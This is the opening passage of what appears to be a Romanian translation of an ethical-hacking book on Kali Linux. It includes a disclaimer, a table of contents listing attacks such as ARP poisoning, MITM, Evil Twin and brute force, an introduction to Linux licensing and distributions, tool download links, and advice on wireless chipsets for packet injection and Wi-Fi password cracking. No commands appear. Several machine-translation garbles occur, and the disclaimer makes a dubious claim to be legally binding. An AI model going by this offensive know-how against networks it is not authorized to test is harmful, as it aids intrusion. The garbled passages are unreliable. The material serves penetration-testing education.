Sunteți pe pagina 1din 87

HACKING ETIC

CU
KALI LINUX
ÎNVĂȚAȚI RAPID CUM SĂ HACKEȚI CA UN PROFESIONAL
DE
HUGO HOFFMAN
Toate drepturile rezervate.
Toate drepturile rezervate.
Nicio parte a acestei cărți nu poate fi reprodusă sub nicio formă sau prin orice
mijloace electronice, tipărite sau mecanice, inclusiv sisteme de stocare și recuperare a
informațiilor, fără permisiunea scrisă a
editorului.
Copyright © 2020
Exonerare de responsabilitate
Profesioniștii trebuie consultați după cum este necesar înainte de a întreprinde oricare dintre
acțiunile susținute aici. În nicio circumstanță nu va fi ținută nicio responsabilitate legală
sau vină împotriva editorului pentru orice reparație, daune sau
pierderi bănești datorate informațiilor prezentate, fie direct, fie indirect. Această
declarație este considerată corectă și valabilă atât de către Asociația Baroului American,
cât și de Comitetul Asociației Editorilor și este obligatorie din punct de vedere juridic
pe întreg teritoriul Statelor Unite. Nu există scenarii în care editorul
sau autorul original al acestei lucrări să poată fi în vreun fel considerat răspunzător pentru
orice dificultăți sau daune care ar putea apărea cititorului sau oricui altcineva după ce
a luat informațiile descrise aici. Informațiile din
paginile următoare sunt destinate doar în scop informativ și, prin urmare, ar trebui să fie
considerate
universale. Așa cum se potrivește naturii sale, este prezentat fără asigurare
cu privire la valabilitatea continuă sau la calitatea sa intermediară. Mărcile comerciale
menționate
se fac fără acordul scris și nu pot fi în niciun caz considerate
o aprobare din partea deținătorului mărcii comerciale.
Publicul vizat
Această carte este destinată oricărei persoane care dorește să devină un hacker etic sau un
tester de penetrare în domeniul securității informațiilor. Această carte este scrisă în
limba engleză de zi cu zi și nu este nevoie de cunoștințe tehnice. Conținutul
acestei cărți va oferi un ghid practic despre cum puteți utiliza Kali Linux pentru
a implementa diferite atacuri atât pe rețelele cu fir, cât și pe cele fără fir. Dacă vă
pregătiți să deveniți un profesionist IT, cum ar fi un hacker etic, un
analist de securitate IT, un inginer de securitate IT, un analist de rețea, un inginer de rețea
sau un tester de penetrare, dar încă aveți îndoieli și doriți să aflați despre
securitatea rețelei, veți găsi această carte extrem de utilă. Veți învăța
concepte și metodologii cheie care se învârte în jurul Securității rețelei, precum și
tehnologii cheie pe care ar trebui să le aveți în vedere. Dacă sunteți cu adevărat interesat să
deveniți un hacker etic sau un tester de penetrare, această carte este pentru dvs.
Presupunând că vă pregătiți să deveniți un profesionist în securitatea informațiilor,
această carte vă va oferi cu siguranță detalii grozave care vă vor beneficia pe măsură ce veți
intra în
această industrie.
Introducere
În primul rând, vom începe cu Introducerea în Linux, dacă aveți o
idee generală despre ce este acest sistem de operare. În continuare, vom
analiza aceleași recomandări de software și hardware pentru hackeri etici
și vom trece direct la instalarea Vitrual Box și Kali Linux. Această carte este
în principal despre instrumentele Kali Linux și despre cum să le implementăm, dar mai întâi
trebuie să ne
uităm la înțelegerea testării de penetrare și la modul în care funcționează cu
recunoaștere și amprentă. Vom analiza fiecare pas pe care
ar trebui să-l faceți ca tester de penetrare, care includ Etapa 1, Etapa 2 și Etapa
3. Acest lucru este important pentru a înțelege cum să vă ocupați de un loc de muncă ca un
hacker etic. De exemplu, ce fel de întrebări ar trebui să puneți când sunteți
angajat de un client. Deci, în această secțiune, vom include ce,
când, cum, dar și toate cerințele legale, astfel încât să vă puteți acoperi spatele.
De asemenea, ne vom uita la Standardele de testare a penetrației, astfel încât să puteți decide
care dintre ele vi se potrivește cel mai bine. În continuare, vom începe mai practic prin
înțelegerea Footprinting și descoperirea gazdei cu Port Scanning. După
aceea, ne vom murdări înțelegând cum puteți descoperi
dispozitive cu Hping3, cum să configurați un proxy pentru Burp Suite și cum să vizați
dispozitivele cu Burp Scanner. În continuare, ne vom uita la unele
teste de aplicații, cum ar fi Randomizing Sessions Tokens, Spidering & SQL Injection
cu SQLmap. Apoi trecem mai departe și începem să privim atât
atacurile cu fir, cât și fără fir folosind Kali Linux. Ne vom uita la atacul dicționarului cu
Airodump-ng, la otrăvirea ARP cu EtterCAP și la implementarea
recunoașterii pasive. În continuare, ne vom uita la captarea atât
a traficului cu fir, cât și fără fir folosind Port Mirroring, implementarea SYN Scan Attack și
utilizarea
Xplico. În continuare, vom implementa MITM Attack în diferite moduri, cum ar fi
utilizarea Ettercap sau SSLscript. Mergând mai departe, veți învăța cum să manipulați
Packet folosind instrumentul numit Scapy și cum să captați traficul IPv6 cu
Parasite6. În continuare, vom implementa atacuri DoS în diferite moduri, fie
utilizând un atac de deautentificare, fie creând un punct de acces Rogue sau
Evil Twin cu un instrument numit MKD3. În continuare, ne vom uita la
implementarea unui atac de forță brută cu TCP Hydra, dar apoi ne vom uita la
implementarea diferitelor atacuri în același timp la cerere, cu niște
instrumente foarte puternice și periculoase, cum ar fi Hail Mary de la Armitage, Metasploit.
Framework sau SET (Setul de instrumente de inginerie socială). Aceste instrumente sunt
disponibile
atât pentru pălărie albă, cât și pentru pălărie neagră. Odată aplicat, rezultatul va fi
același în ambele cazuri. Ceea ce trebuie să înțelegeți, este că poate duce la o
situație îngrozitoare pentru persoana care utilizează astfel de instrumente de hacking în orice
mod neautorizat, ceea ce ar putea cauza deteriorarea sistemului sau orice întrerupere a
sistemului. Dacă
încercați să utilizați oricare dintre aceste instrumente într-o rețea cu fir sau fără fir fără a fi
autorizat și deranjați sau deteriorați orice sistem, aceasta ar fi considerată
hacking ilegală. Prin urmare, aș dori să încurajez toți cititorii să
implementeze orice instrument descris în această carte DOAR PENTRU UTILIZAREA
PĂLĂRIILOR ALBE.
Orice lucru autorizat legal pentru a ajuta persoanele sau companiile să găsească
vulnerabilități și să identifice riscurile potențiale este în regulă. Toate instrumentele pe care le
voi descrie,
ar trebui să le utilizați numai pentru îmbunătățirea poziției de securitate. Dacă sunteți dornic să
aflați
despre hacking și testarea de penetrare, este recomandat să construiți un laborator acasă
și să exersați utilizarea acestor instrumente într-o rețea izolată asupra căreia aveți
control deplin și nu este conectată la niciun mediu de producție sau
internet. Dacă utilizați aceste instrumente în scopuri de pălărie neagră și veți fi prins,
va fi în întregime pe seama voastră și nu veți avea pe cine să învinovățiți. Așadar, din nou, aș
recomanda cu căldură să rămâneți în spatele liniilor și orice faceți ar trebui să fie
complet legitim și pe deplin autorizat. Dacă nu sunteți sigur despre ceva ce
faceți și nu aveți nicio idee despre rezultat, întrebați-vă managerul sau NU O
FACEȚI. Această carte este în scop educațional. Este pentru cei care sunt
interesați să învețe și să știe ce se află în spatele perdelei și ar dori
să devină un hacker etic sau un tester de penetrare. Pe lângă problemele legale,
înainte de a utiliza oricare dintre instrumente, este recomandat să aveți
cunoștințele fundamentale despre conceptele de rețea.
Cuprins
Capitolul 1 Introducere în Linux
Capitolul 2 Recomandări software și hardware
Capitolul 3 Instalarea Virtual Box și Kali Linux
Capitolul 4 Introducere în testarea de penetrare
Capitolul 5 Testarea stiloului în etapa 1
Capitolul 6 Testarea stiloului în etapa 2
Capitolul 7 Testarea stiloului în etapa 3
Capitolul 8 Standarde de testare a penetrației
Capitolul 9 Introducere în Footprinting
Capitolul 10 Descoperirea gazdei cu scanarea portului
Capitolul 11 ​Descoperirea dispozitivului cu Hping3
Capitolul 12 Configurarea Burp Suite Proxy
Capitolul 13 Configurarea țintei pentru Burp Scanner
Capitolul 14 Randomizarea sesiunilor de jetoane
Capitolul 15 Burp Spider-ing și
capitolul SQL Injection 16 Injecție SQL cu SQLmap
Capitolul 17 Atacul de dicționar cu Airodump-ng
Capitolul 18 Otrăvirea ARP cu EtterCAP
Capitolul 19 Capturarea traficului cu oglindirea porturilor
Capitolul 20 Recunoașterea pasivă cu Kali
Capitolul 21 Capturarea atacului SYN Scan
Capitolul 22 Capturarea traficului cu Xplico
Capitolul 23 Ettercap Attack23
Capitolul 24 Atacul MITM cu SSLstrip
Capitolul 25 Manipularea pachetelor cu Scapy
Capitolul 26 Atacul de deautentificare împotriva Rogue AP
Capitolul 27 Capturarea pachetelor IPv6 cu Parasite6
Capitolul 28 Atacul Evil Twin Deauthentication cu mdk3
Capitolul 29 Atacul DoS cu MKD3 Brute Hydra Capitolul 30 Capitolul 33
Brute Hydra
Armitage Hail Mary
Capitolul 32 Cadrul Metasploit
Capitolul 33 Setul de instrumente de inginerie socială
Concluzie
Despre autor
Capitolul 1 Introducere în Linux
Pentru a înțelege Linux, cel mai important sistem de operare al lumii cloud, Internet of
Things, DevOps și Enterprise, este esențial pentru un cariera IT.
Nu este ușor să înțelegi lumea licențelor software deschise, dar permiteți-mi să
vă ofer câteva aspecte importante. Dacă intenționați să lucrați cu software liber precum
Linux, ar trebui să înțelegeți elementele de bază ale regulilor care îl guvernează.
Să ne uităm mai întâi la licențiere. Există trei metode principale de licențiere; Free
Software Foundation fondată în 1985 de Richard Stallman, mai tânără
Open Source Initiative și Creative Commons.
În primul rând, Free Software Foundation dorește ca software-ul să fie gratuit, nu la fel
de gratuit, ci să permită utilizatorilor libertatea de a face tot ce le place cu el.
Gândește-te așa.
Poate că trebuie să plătești pentru el, dar odată ce este al tău, poți face ce vrei
cu el. Richard Stallman și fundația sa sunt autorii originali ai
GPL și ai Licenței Publice Generale GNU, care le permite utilizatorilor dreptul de a
face orice doresc cu software-ul lor, inclusiv să-l modifice și să-
l vândă, atâta timp cât nu fac modificări ale condițiilor inițiale ale licenței.
Nucleul Linux este cea mai importantă bucată de software lansată pe
GPL. Dar, Open Source Initiative, deși cooperează cu
fundația de software liber acolo unde este posibil, consideră că ar trebui să existe
acorduri de licențiere mai flexibile care pot fi obținute dacă software-ul open source va
obține cel mai mare impact posibil pe piața de software mai mare.
Open Source înseamnă că codul de programare original al unei piese de software
este disponibil gratuit pentru utilizatori, împreună cu programul în sine.
Licențele care se aliniază mai îndeaproape obiectivelor OSI, dar includ diferite
versiuni ale Berkeley Software Distribution, alias BSD, care obligă puțin
mai mult decât redistribuirile afișează notificarea de copyright
și declinarea răspunderii pentru software-ul original.
Acest lucru facilitează implementarea
software-ului modificat de către dezvoltările comerciale sub modele noi de licență, fără a fi
nevoiți să se preocupe de încălcarea
măsurilor anterioare.
Denumirile FOSS și FLOSS pot contribui la reflectarea modificărilor
dintre aceste două viziuni. FOSS implică doar că software-ul poate fi
achiziționat gratuit, deși FLOSS se concentrează pe ceea ce puteți face cu
software-ul odată ce îl obțineți.
Licența Creative Commons autorizează creatorii de aproape orice, cum ar
fi software, filme, muzică sau cărți, să aleagă exact drepturile pe care doresc să
le rezerve.
În cadrul sistemului Creative Commons, un creator poate alege manual între orice
combinație a următoarelor cinci elemente; atribuirea, care permite
modificarea și redistribuirea atâta timp cât este inclusă atribuirea creatorului;
share-alike, ceea ce necesită ca condițiile originale ale licenței să fie incluse
în toate distribuțiile și copiile viitoare.
Apoi se numește „non-comercial”, care permite doar utilizarea necomercială;
fără lucrări derivate, permițând redistribuirea ulterioară, ci doar
copii nemodificate; și domeniul public, care permite toate utilizările posibile.
Este esențial atunci când utilizați software lansat sub Creative Commons să fiți
conștienți de exact ce elemente au fost selectate de autor. Condiția
creative commons share-alike, împreună cu GPL-ul lui Stallman sunt, în
termeni practici, legate de sistemul de distribuție copy left.
Licențele Copy left permit reciclarea completă și redistribuirea unui
pachet de software, dar numai atunci când permisiunile substanțiale originale sunt incluse în
distribuția de nivel următor.
Acest lucru poate fi valoros pentru autorii care nu doresc ca software-ul lor să evolueze
vreodată
în tipuri de licențe închise, dar doresc ca derivatele sale să rămână gratuite pentru totdeauna.
Licențele open source fără
copiere sunt adesea denumite
licențe permisive.
De obicei, licențele permisive nu vor necesita respectarea niciunei
restricții pentru părinți. Exemple de astfel de licențe care permit adesea aproape orice utilizare
a
software-ului de licență, atâta timp cât lucrarea originală este atribuită în derivate,
sunt licențele MIT, BSD și Apache.
În zilele noastre, aproape Apache și MIT sunt cele mai utilizate pe scară largă.
Dar pentru că software-ul open source este gratuit, nu înseamnă că nu are loc
în operațiunile companiilor „pentru profit”.
De fapt, produsele multor companii mari și mai profitabile sunt construite,
folosind software-ul open source. În multe cazuri, companiile își vor lansa liber
software-ul ca sursă deschisă, precum și furnizarea de servicii premium și
asistență consumatorilor plătitori.
De exemplu, distribuțiile Ubuntu și CentOS Linux sunt de acest model,
deoarece sunt susținute în mod constant de Canonical și Red Hat și ambele
sunt în domeniul furnizării de asistență pentru clienții întreprinderi, iar
acestea sunt afaceri foarte serioase.
Un alt exemplu este Red Hat Linux, care a fost achiziționat de IBM pentru peste
30 de miliarde de dolari. Este demn de remarcat faptul că curentul principal al
contribuțiilor la codul de programare la nucleul Linux este scris de personal cu normă întreagă
ai
companiilor mari de tehnologie, inclusiv Google și Microsoft.
În mod ciudat, vizualizarea licenței pentru utilizatorul software-ului open source pe
dispozitivul dvs. nu este întotdeauna atât de ușoară. Aplicațiile desktop își vor face în mod
frecvent
disponibile informațiile despre licență prin intermediul selecțiilor din meniul „ajutor și despre”,
dar în
alte cazuri, cea mai bună modalitate de a găsi informații despre licență pentru un anumit
produs este
să vizitați site-ul lor web.
Nucleul Linux original a fost creat de Linus Torvalds la începutul anilor 90 și
apoi donat comunității. Comunitate înseamnă oricine, oricând,
oriunde și donat înseamnă că codul de programare al oricărei
componente Linux va fi disponibil gratuit pentru ca oricine să descarce, să modifice și să facă
orice își dorește cu el, inclusiv să profite de propriile
versiuni personalizate dacă doresc .
Un sistem de operare pentru computer sau OS este un set de instrumente software concepute
pentru
a interpreta comenzile unui utilizator, astfel încât acestea să poată fi traduse în termeni pe
care
computerul gazdă îi poate înțelege. Aproape orice sistem de operare poate fi instalat
și lansat pe majoritatea arhitecturii hardware standard, presupunând că are suficientă
memorie și putere de procesare pentru a suporta caracteristicile sistemului de operare.
Prin urmare, puteți încărca Linux nativ pe orice computer sau Mac OS, o
placă de dezvoltare minuscul care rulează un procesor ARM sau ca
imagine de container virtualizată într-un mediu Docker.
Aproape toate sistemele de operare desktop oferă două moduri de a-și accesa instrumentele
printr-o interfață grafică de utilizator, cunoscută și sub numele de GUI, și printr-o
interfață de linie de comandă sau CLI.
Fiecare sistem de operare modern vă permite să rulați în mod sigur și consecvent
instrumente sofisticate de productivitate și divertisment prin GUI și
oferă un mediu potrivit în care vă puteți dezvolta propriul software,
ceea ce a fost singurul lucru pe care îl puteau face primele computere personale.
Toate Linux au asta în comun, dar ceea ce fac diferit este ceea ce este
mai interesant. Cea mai evidentă diferență între Linux și
concurenții săi comerciali sunt limitările comerciale.
Alții le au, iar Linux nu. Aceasta înseamnă că sunteți liber să instalați
câte versiuni de Linux pe câte dispozitive hardware doriți și
nimeni nu vă va spune altfel.
Această libertate schimbă modul în care vă veți folosi sistemul de operare, deoarece
vă oferă flexibilitate de a face modificările și personalizările care se potrivesc
cel mai bine cerințelor dumneavoastră.
Nu este neobișnuit să luați un hard disk cu un sistem de fișiere Linux instalat de pe
un computer și să îl puneți pe altul și va funcționa foarte bine în opus
fie cu Windows sau Mac OS.
Adesea, au până la jumătate de duzină de instanțe Linux virtuale și fizice
care rulează simultan, în timp ce testez diferite procese software și
design de rețea, lucru pe care poate nu l-aș încerca niciodată dacă aș avea nevoie de
licențe separate.
Acest lucru ar trebui să aibă două avantaje imediate pentru tine. În primul rând, puteți petrece
mult
timp experimentând cu diverse distribuții și desktop-uri Linux pe măsură ce
abilitățile dvs. Linux cresc și puteți lansa în mod natural implementarea de testare înainte de a
lansa noile resurse bazate pe Linux ale companiei pentru a vă asigura că rulează
corect.
Mediul Linux conține trei tipuri de software; kernel-ul Linux,
interfața desktop, cum ar fi GNOME sau Cinnamon, și personalizări
oferite de distribuția dvs. specifică, cum ar fi Ubuntu sau Red Hat.
În general, nu veți descărca sau gestiona direct nucleul Linux.
Acest lucru va fi gestionat pentru dvs. de procesele de instalare și actualizare utilizate de
distribuția pe care o alegeți.
Pentru a menține stabilitatea, nu este neobișnuit ca distribuțiile să ignore în mare parte
lansările de kernel noi care nu sunt critice timp de mai multe luni. Distribuțiile, în special
cele mai mari și mai cunoscute, sunt actualizate în mod obișnuit, în timp ce
corecțiile de securitate și caracteristicile critice sunt disponibile aproape instantaneu.
Majoritatea distribuțiilor au gestionat depozite de software terțe și
instrumente de gestionare a pachetelor pentru gestionarea actualizărilor. Dacă vă uitați la
dialogul Software și actualizări în casetele Linux, puteți alege cum doriți
să fie aplicate actualizările.
Pe lângă sistemul de operare, există mii de
pachete software gratuite disponibile care vă permit să efectuați orice sarcină de calcul
fezabilă,
mai rapid și mai sigur decât ați putea pe alte platforme.
Fie că sunteți în căutarea unor suite de productivitate de birou sau a unui server web și
a serviciilor de securitate, toate acestea vor fi integrate în structura sistemului Linux
de către manageri de pachete de încredere.
De exemplu, dacă doriți să utilizați software de editare, cum ar fi Adobe pe Windows
sau Mac, pentru a le face să funcționeze eficient fără a intra în încetinirile sistemului,
veți avea nevoie de un procesor rapid, 32 GB de RAM și o memorie RAM video dedicată.
Aceste platforme ar putea costa mii de dolari și necesită sisteme de răcire pentru a
le împiedica să se topească. Cu toate acestea, dacă ați folosi Linux,
puteți rula procese virtualizate, împreună cu sarcini zilnice obișnuite pe un
computer simplu, construit din mai puțin de 300 USD.
Deoarece Linux este open source, mulți oameni și-au creat propriile versiuni ale
sistemului de operare, cunoscute sub numele de distribuții sau „distros” pentru a se potrivi
nevoilor specializate. Cel mai
faimos dintre acestea este sistemul de operare Android de la Google pentru telefoane
inteligente, dar există
sute de altele, inclusiv distribuții de implementare pentru întreprinderi, cum ar fi Red Had
Enterprise, și reconstrucția comunității gratuite, CentOS de exemplu.
Există o distribuție special optimizată pentru
aplicații științifice și matematice avansate numită Scientific Linux, Kali Linux pentru
testarea și managementul securității rețelei, pe care o vom aprofunda în curând,
dar alte distribuții construite pentru a fi încorporate în
dispozitive IoT sau Internet of Things, cum ar fi Raspbian pentru placa de dezvoltare Raspberry
Pi ultra ieftină
.
Distribuțiile sunt adesea grupate în familii. De exemplu, o anumită
distribuție ar putea câștiga o reputație pentru stabilitate, design bun, corecție rapidă
și un ecosistem sănătos de software terță parte.
În loc să fie nevoite să reinventeze roata, alte comunități ar putea bifurca
versiuni derivate ale acelei distribuții părinte și propriile lor personalizări și
să le distribuie sub un nume nou, dar relația originală părinte-copil
rămâne.
Actualizările și corecțiile sunt transmise de la părintele din amonte, în aval, către toți
copiii. Aceasta este o modalitate eficientă și eficientă de a menține
sisteme autonome.
Cele mai cunoscute familii de distribuție sunt Debian, care menține un
ecosistem în aval care include Ubuntu, de exemplu, universal.
Mint Kali Linux și Red Hat sunt responsabile pentru CentOS; și
distribuții Fedora orientate către consumatori; SUSE, care oferă OpenSUSE; și infamul
complex, dar ultra-eficient Arch Linux, ai cărui adepți în aval includ
LinHES pentru Home Entertainment Management și GUI-ul axat pe
Manjaro.
Veți găsi, de asemenea, imagini de distribuție Linux pentru toate tipurile de
implementări dedicate. Distribuțiile extrem de ușoare pot fi încorporate în
dispozitivele Internet of Things, cum ar fi frigiderele sau becurile.
Containerele Docker sunt rapide și eficiente deoarece partajează nucleul sistemului de operare
cu mediile lor gazdă Linux și pot fi construite folosind o gamă largă
de imagini bazate pe Linux.
Cloud, condus de AWS sau Amazon Web Services și Azure,
serviciul de calcul virtualizat la cerere este grozav, deoarece conține despre tot ceea ce
știm despre computere.
Linux este multifuncțional și gratuit, prin urmare este sistemul de operare perfect pentru
implementările cloud. O altă versiune Linux este utilizată pentru a rula o
majoritate semnificativă a aparițiilor în cloud este găzduită pe platforma cloud Microsoft
Azure.
Semnificația trecerii la nivel de industrie către cloud este apariția
distribuțiilor Linux specializate, care sunt concepute pentru a oferi cea mai bună
experiență de cloud posibilă, fiind cât mai mici și rapide posibil.
Aceste distribuții de specialitate vor include în mod frecvent funcționalități ieșite din cutie,
care vă permit să profitați de mediul dvs. specific de gazdă în cloud.
Aceste distribuții includ, de exemplu, Amazon Linux AMI de la AWS. AMI înseamnă Amazon
Machine Image și versiuni Ubuntu de asistență
pe termen lung special concepute .
Asistența pe termen lung sau versiunile LTS sunt construite pentru a fi la fel de
stabile folosind software și configurații complet testate.
Fiabilitatea unor astfel de configurații face posibil ca
managerii de distribuție să continue să ofere actualizări de securitate și caracteristici pentru o
versiune timp de
5 ani.
Puteți implementa o versiune LTS ca server fără să vă faceți griji să o reconstruiți în tot
acest timp. Dacă doriți să încercați cele mai recente și mai bune versiuni de software,
puteți continua și instala cea mai recentă versiune intermediară, dar pentru
medii stabile, trebuie să aveți un LTS.
Pe scurt, software-ul open source poate fi livrat folosind diverse
modele de licență. GPL, licența publică generală GNU permite orice utilizare,
modificare sau redistribuire atâta timp cât termenii licenței originale nu sunt
modificați.
Licențele Creative Commons permit condiții de licență mai restrictive pentru a oferi
mai multe opțiuni creatorilor de software. Alte modele majore de licențiere includ
Apache, BSD și MIT.
Linux este o platformă flexibilă care poate fi personalizată pentru a alimenta orice
dispozitiv de calcul, ambele; fizice sau virtuale. Ați aflat despre distribuțiile Linux care
împachetează nucleul Linux, împreună cu desktop-uri GUI și software
și configurații specializate.
Familiile de distribuție pe care le-am discutat includ Red Hat Enterprise Linux,
Debian și Arch. În concluzie, acum aveți o înțelegere de bază despre
modurile în care distribuțiile corectează și întrețin software-ul în mașinile Linux, precum
și despre modul în care acestea fac în mod frecvent disponibile versiuni noi, inclusiv
versiunile LTS sau de asistență pe termen lung.
Înainte de a instala orice Linux, vreau să spun că instalarea Linux nu este o
misiune simplă. Există atât de multe platforme pe care puteți instala Linux,
atât de multe distribuții și versiuni de distribuție și fiecare cu propriul
program de instalare, atât de multe opțiuni de configurare și atât de multe
căi de instalare diferite, care prezintă un mic subset al subiectului într-un mod logic.
calea este o provocare.
Puteți instala Linux pe computere și servere tradiționale. Pe lângă faptul că
sistemul de operare Android în sine este construit pe un nucleu Linux, nimic nu vă împiedică
să instalați o distribuție mai populară, dar rețineți că astfel de
experimente se pot termina prost pentru dispozitiv.
Ce zici de un frigider sau ceva mai mic, cum ar fi o jucărie pentru copii, care este
probabil să fie produs în număr foarte mare, sau servere virtuale care sunt
proiectate să trăiască câteva secunde, să îndeplinească o anumită sarcină sensibilă la timp și
apoi să se închidă pentru totdeauna ?
Ei bine, procesele obișnuite de instalare nu vor funcționa corect în acele scenarii, așa că
va trebui adesea să gândiți în afara casetei. Multe dispozitive Internet of Things
folosesc plăci de dezvoltare minuscule, cum ar fi ieftinul Raspberry Pi, pentru a-și rula
operațiunile de calcul.
În cazul lui Pi, puteți construi o imagine a sistemului de operare pe propriul computer și o
puteți introduce
pe un card SD, pe care apoi îl puteți introduce în dispozitiv și îl puteți porni. Serverele virtuale
pot fi furnizate folosind scripturi care definesc
sistemul de operare precis și detaliile de configurare pe care le căutați.
Uneori, ca răspuns la un declanșator extern, scripturile vor
activa automat resursele din mediul țintă și le vor implementa după cum este necesar pentru a
satisface cererea în schimbare.
Varietatea și flexibilitatea inerente ecosistemului Linux și open source
fac posibilă asamblarea combinației potrivite de straturi software
necesare pentru a se potrivi cu resursele hardware pe care le utilizați și cu
volumul de lucru de calcul.
În cursul unei instalări tradiționale Linux, te vei confrunta cu opțiuni
privind unele dintre setările de mediu în care va
funcționa sistemul de operare, modul în care computerul se va conecta la rețea, ce fel de
cont de utilizator vei crea pentru fiecare zi. -administrarea zilnică și ce dispozitive de stocare
veți utiliza pentru software-ul și datele utilizate de sistemul dvs.
Să vorbim despre acestea pe rând. Distribuțiile Linux vă permit să alegeți să
interacționați cu GUI utilizând oricare dintre limbi, dar va trebui să
specificați ce limbă doriți și ce aspect de tastatură utilizați.
Limba pe care o alegeți va determina ce veți vedea în casetele de dialog și
meniurile de configurare de pe desktop. De asemenea, va trebui să vă setați
locația, astfel încât Linux să vă cunoască fusul orar.
Multe dintre operațiunile dvs. de gestionare a rețelei și a fișierelor vor depinde de
setarea fusului orar, așa că doriți să faceți acest lucru corect. Aceste setări pot fi actualizate
ulterior
fie folosind GUI, fie CLI.
Dacă este posibil, este mai bine să activați accesul la internet înainte de
începerea instalării. În acest fel, distribuția dvs. poate descărca cele mai recente actualizări
care ar putea să nu fie incluse în arhiva dvs. de instalare, astfel încât veți avea un
lucru mai puțin de făcut atunci când vă conectați la noua stație de lucru.
Programul de instalare CentOS vă va întreba dacă doriți să configurați un
utilizator obișnuit pentru sistemul dvs. sau dacă sunteți bine doar cu utilizatorul root.
Deși nu sunteți forțat să creați un utilizator obișnuit, pentru a vă întări
postura de securitate, este recomandat să evitați să vă conectați ca utilizator „rădăcină” pentru
operațiuni normale.
Ca alternativă, autentificarea și finalizarea activității dvs. ca utilizator obișnuit
care poate, atunci când este necesar, invoca puteri de administrare folosind pseudo, este
mult mai bine.
Procesele standard de instalare Ubuntu, de exemplu, nu vor oferi nici măcar opțiunea de
a folosi root. Puteți opta oricând să optați pentru abordarea implicită pentru
dispozitivele de stocare în care, în majoritatea cazurilor, întregul sistem de fișiere va fi instalat
într-o
singură partiție, dar este posibil să doriți să explorați alte opțiuni pentru
cazuri de utilizare mai complicate sau neobișnuite.
Mulți administratori de server preferă să păstreze ierarhia directorului „/var” izolată într-
o partiție separată pentru a se asigura că datele din jurnalul de sistem nu copleșesc restul
sistemului.
Puteți utiliza un SSD mic, dar rapid sau o unitate SSD pentru majoritatea
fișierelor de sistem, în timp ce directoarele mai mari „acasă” și „var” sunt montate pe un
hard disk mai mare, dar mult mai lent.
Acest lucru vă permite să utilizați viteza SSD-ului pentru rularea binarelor Linux,
în timp ce scapă cu un hard disk magnetic mai puțin costisitor pentru datele dvs.,
unde diferența de performanță nu ar fi la fel de vizibilă.
Veți fi întrebat dacă doriți ca dispozitivele dvs. de stocare să fie gestionate ca
„volume LVM”. Dar ce este un „volum LVM”?
Ei bine, LVM înseamnă Logical Volume Manager, care este o modalitate de a virtualiza
dispozitivele de stocare, astfel încât acestea să fie ușor de manipulat ulterior. Dar cum
functioneaza?
Ei bine, să ne imaginăm că aveți trei unități fizice separate pe
sistemul dvs. LVM le-ar transforma pe toate într-un singur grup de volume, a cărui
capacitate este egală cu spațiul total agregat din toate cele trei unități.
În orice moment, veți fi liber să creați câte volume logice din acel
grup de volume doriți, folosind orice combinație de capacitate individuală, până
la volumul total disponibil.
Dacă cele 3 unități tale aveau dimensiunea separată de 2 TB, 500 GB și 200 GB și trebuia
să lucrezi cu o unitate de date de cel puțin 2,3 TB, ai putea folosi LVM pentru a
crea un volum logic de 2,3 TB și un al doilea volum de 400 GB pentru
orice altceva.
Dacă cerințele dvs. se schimbă în viitor, puteți reduce dimensiunea
unității de date și puteți transfera datele suplimentare pe al doilea volum sau pe un nou
volum. Adăugarea sau schimbarea volumelor pot fi
operații relativ simple. LVM vă poate oferi o flexibilitate fantastică de configurare, dar pentru
setări simple, în mod normal, nu este esențial.
Acum că sunteți la curent cu o parte din teorie, puteți continua și să treceți
direct la instalarea Kali Linux, dar înainte de a face asta, aș dori să
vă recomand câteva alte software-uri și hardware pe care ar trebui să le obțineți ca
Pen Tester.
Capitolul 2 Recomandări software și hardware
Tcpdump
https://www.tcpdump.org/
Microsoft Net Mon
https://www.microsoft.com/en-us/Download/confirmation.aspx?id=4865
LanDetective
https://landetective. com/download.html
Chanalyzer
https://www.metageek.com/support/downloads/
Ettercap
https://www.ettercap-project.org/downloads.html
NetworkMiner
https://www.netresec.com/?page= NetworkMiner
Fiddler
https://www.telerik.com/fiddler
Wireshark
https://www.wireshark.org/download.html
Kali Linux
https://www.kali.org/downloads/
vmWare
https://my.vmware. com/web/vmware/downloads
Virtual Box
https://www.virtualbox.org/wiki/Downloads
Mulți oameni par să devină confuzi când vorbim despre adaptoare wireless
și carduri wireless. Ei nu știu ce sunt, de ce avem nevoie de ele
și cum să-l selectăm pe cel potrivit pentru că există atât de multe mărci și atât de
multe modele.
Ceea ce înțelegem prin adaptor wireless este dispozitivul pe care îl conectați la
computer printr-un port USB și care vă permite să comunicați cu alte
dispozitive ale Wi-Fi-ului nostru, astfel încât să îl puteți utiliza pentru a conecta rețele wireless
și
a comunica cu alte computere care utilizați Wi-Fi.
S-ar putea să vă gândiți că laptopul dvs. are deja acest lucru și da, majoritatea laptopurilor
și telefoanelor inteligente au deja acest lucru încorporat. Dar, există două probleme cu
asta.
Prima problemă este că nu puteți accesa adaptoarele wireless încorporate cu Kali
Linux dacă este instalată ca o mașină virtuală, iar a doua problemă este că aceste
adaptoare wireless încorporate nu sunt bune pentru a pătrunde în rețelele wireless.
Chiar dacă ați instalat Kali Linux ca mașină principală pe laptop și apoi
veți avea acces la cardul wireless încorporat, tot doriți să puteți
utiliza acest adaptor wireless pentru testarea de penetrare, deoarece nu acceptă
modul monitor , sau injecție de pachete.
Vrei să-l poți folosi pentru a sparge parolele Wi-Fi și pentru a face toate
lucrurile minunate pe care le putem face în Kali Linux cu aircrack-ng și alte instrumente.
Înainte de a începe să vorbim despre mărcile și modelele care vor funcționa cu
Kali Linux, vreau să vorbesc despre un factor mai important, care este chipsetul
care este folosit în interiorul adaptorului wireless.
Uită de marcă pentru moment. În schimb, vom vorbi despre creierul
care face toate calculele în interiorul adaptorului wireless. Acesta este ceea ce
determină dacă adaptorul este bun sau rău. Fie că acceptă
modul de injecție și monitor și funcționează cu Kali Linux, marca este irelevantă.
Ceea ce este folosit în interiorul adaptorului este important și, prin urmare, chipsetul. Există
multe chipset-uri care acceptă modul monitor și injecția de pachete și Kali
Linux. Există unul produs de compania Atheros, iar modelul său
este AR9271. Acest chipset acceptă modul monitor sau injecția de pachete sau puteți
utiliza chipsetul pentru a crea un punct de acces fals sau îl puteți folosi pentru a pirata
rețelele.
Deci, puteți folosi acest chipset pentru a face aproape toate atacurile Kali Linux. Singura
problemă cu acest chipset este că acceptă doar 2,4 gigaherți, așa că dacă
ținta dvs. folosește 5 gigaherți sau unele dintre dispozitive sunt conectate peste 5g, atunci
nu veți putea comunica cu aceste dispozitive.
Nici măcar nu le vei putea vedea, așa că nu vei putea lansa atacuri
